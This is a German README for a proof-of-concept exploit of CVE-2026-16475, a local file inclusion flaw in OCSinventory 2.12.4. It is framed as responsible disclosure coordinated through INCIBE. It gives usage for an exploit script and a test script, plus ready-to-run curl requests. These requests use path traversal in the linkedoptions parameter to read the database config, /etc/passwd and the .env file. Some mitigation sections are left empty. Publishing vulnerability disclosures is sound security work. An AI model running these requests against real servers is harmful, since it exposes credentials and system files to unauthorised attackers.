
Dies ist das offizielle Repository mit dem PoC der CVE-2026-16475, LFI in OCSinventory 2.12.4.
Local-File-Inclusion-Schwachstelle in OCSinventory 2.12.4
CVE ID: CVE-2026-16475
CVSS-Score: 6.9 (Mittel)
CWE: CWE-98 (Unsachgemäße Kontrolle des Dateinamens für Include/Require-Anweisungen in PHP-Programmen)
Betroffene Version: OCSinventory 2.12.4
Status: In den neuesten Versionen gepatcht
Im Endpunkt /ajax/teledeployoptions.php besteht eine Local-File-Inclusion-Schwachstelle (LFI), da der Parameter linkedoptions vor seiner Verwendung in einer dynamischen XML-Dateieinbindung nicht ordnungsgemäß bereinigt wird.
Der Endpunkt ist dafür ausgelegt, XML-Konfigurationsdateien zu laden, validiert den Parameter linkedoptions jedoch nicht ordnungsgemäß, was Pfad-Traversal-Angriffe ermöglicht.
Ein nicht authentifizierter Remote-Angreifer kann diese Schwachstelle ausnutzen, um:
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Optionen:
-u, --url - Ziel-URL (erforderlich)-v, --verbose - Ausführliche Ausgabe-o, --output - Erfolgreiche Lesevorgänge in einer Datei speichernBeispiel:
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Bearbeiten Sie die Variable BASE_URL im Skript:
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Für Benutzer:
Für Entwickler:
basename() oder ähnliche Funktionen, um Pfad-Traversal zu verhindernHinweis: CVE-2026-16475 wird über INCIBE koordiniert und ist möglicherweise noch nicht im NVD indexiert. Ziehen Sie für maßgebliche Informationen die INCIBE-Quelle heran.
Nur für Bildungszwecke und autorisierte Tests
Den vollständigen rechtlichen Hinweis finden Sie in DISCLAIMER.md.
Adrián Ferrer Tarí
Verantwortungsvolle Offenlegung, koordiniert über INCIBE